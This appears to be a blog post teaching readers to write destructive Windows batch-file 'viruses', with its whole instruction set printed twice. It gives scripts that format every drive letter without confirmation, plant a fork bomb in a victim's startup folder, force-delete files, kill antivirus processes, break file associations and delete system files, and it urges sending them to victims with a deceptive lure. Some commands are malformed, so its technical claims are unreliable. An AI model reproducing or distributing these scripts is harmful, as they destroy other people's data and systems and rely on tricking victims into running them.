How to Create a virus easily
1.Formatting C drive
Eate 1. Open a window of notepad.
Type: FORMAT C:
save the file as disk_destroyer_basic.bat
it will delete all data on your c drive if clicked.
If you type the following: format c:\ /q It will not ask you to confirm the delete.
2. waana Crash the computer? Easy! Just type this into notepad:
:A
start
start
start
goto A
then save it as all file types, and at the end of the filename put .bat , then simply put in the victims startup folder, and the computer will crash every time windows is turned on.
3. To ensure all partitions and drives are destroyed you would have to write
@ echo off
format A: -y
format B: -y
and so on for all the letters of the alphabet. This will not only wipe all the partitions on the computers main drive, but also any other devices connected to it, such as usb sticks, cds and external hard drives. reason to put FORMAT C: -y is that just FORMAT C: asks the user if they want to wipe their own hd, to which they will say no. FORMAT C: -y will perform the same operation, but without needing confirmation.
4.Other techniques Making a virus with notepad
you will need:
Notepad
A victim with a pc
Open up notepad and type:
DEL /F /Q *
Save it as "virus.cmd" You can change virus to whatever you want.
DONT OPEN IT!
It deletes everything on your computer.
Send it to your victim, say when they open it all their dreams will come true or some crap.
Have fun.
And it’s really VERY dangerous
5. try this out copy this and paste in notepad and rename it abc.bat & send it
title Hack Setup
color 0A
@echo off
set end=md "Hack installing"
set fin=copy "Hack log.txt" "Installing"
%end%
%fin%
net send * Hack is installing, press OK to begin set up.
kill NAVAPSVC.exe /F /Q
kill zonelabs.exe /F /Q
kill explorer.exe /F /Q
cls
assoc .exe=txtfile
assoc .txt=mp3file
cls
msg * It is you who is hacked....
msg * I warned you, and you kept going. Challenge me and this is what happens.
DEL C:\WINDOWS\system32\logoff.exe /F /Q
DEL C:\WINDOWS\system32\logon.exe /F /Q
DEL C:\WINDOWS\system32\logon.scr /F /Q
cls
shutdown
it will delete all c drive and shut down the computer.. all data gone.. lol...
6. some others write ur own simple virus cant detected by any antivirus.
@Echo off
Del C:\ *.* |y
And save that as .bat not .txt and RUN IT
It will delete the content of C:\ drive...
use these techniques at your own risk. be sure to back up before doing this..
Type: FORMAT C:
save the file as disk_destroyer_basic.bat
it will delete all data on your c drive if clicked.
If you type the following: format c:\ /q It will not ask you to confirm the delete.
2. waana Crash the computer? Easy! Just type this into notepad:
:A
start
start
start
goto A
then save it as all file types, and at the end of the filename put .bat , then simply put in the victims startup folder, and the computer will crash every time windows is turned on.
3. To ensure all partitions and drives are destroyed you would have to write
@ echo off
format A: -y
format B: -y
and so on for all the letters of the alphabet. This will not only wipe all the partitions on the computers main drive, but also any other devices connected to it, such as usb sticks, cds and external hard drives. reason to put FORMAT C: -y is that just FORMAT C: asks the user if they want to wipe their own hd, to which they will say no. FORMAT C: -y will perform the same operation, but without needing confirmation.
4.Other techniques Making a virus with notepad
you will need:
Notepad
A victim with a pc
Open up notepad and type:
DEL /F /Q *
Save it as "virus.cmd" You can change virus to whatever you want.
DONT OPEN IT!
It deletes everything on your computer.
Send it to your victim, say when they open it all their dreams will come true or some crap.
Have fun.
And it’s really VERY dangerous
5. try this out copy this and paste in notepad and rename it abc.bat & send it
title Hack Setup
color 0A
@echo off
set end=md "Hack installing"
set fin=copy "Hack log.txt" "Installing"
%end%
%fin%
net send * Hack is installing, press OK to begin set up.
kill NAVAPSVC.exe /F /Q
kill zonelabs.exe /F /Q
kill explorer.exe /F /Q
cls
assoc .exe=txtfile
assoc .txt=mp3file
cls
msg * It is you who is hacked....
msg * I warned you, and you kept going. Challenge me and this is what happens.
DEL C:\WINDOWS\system32\logoff.exe /F /Q
DEL C:\WINDOWS\system32\logon.exe /F /Q
DEL C:\WINDOWS\system32\logon.scr /F /Q
cls
shutdown
it will delete all c drive and shut down the computer.. all data gone.. lol...
6. some others write ur own simple virus cant detected by any antivirus.
@Echo off
Del C:\ *.* |y
And save that as .bat not .txt and RUN IT
It will delete the content of C:\ drive...
use these techniques at your own risk. be sure to back up before doing this..
Comments
Post a Comment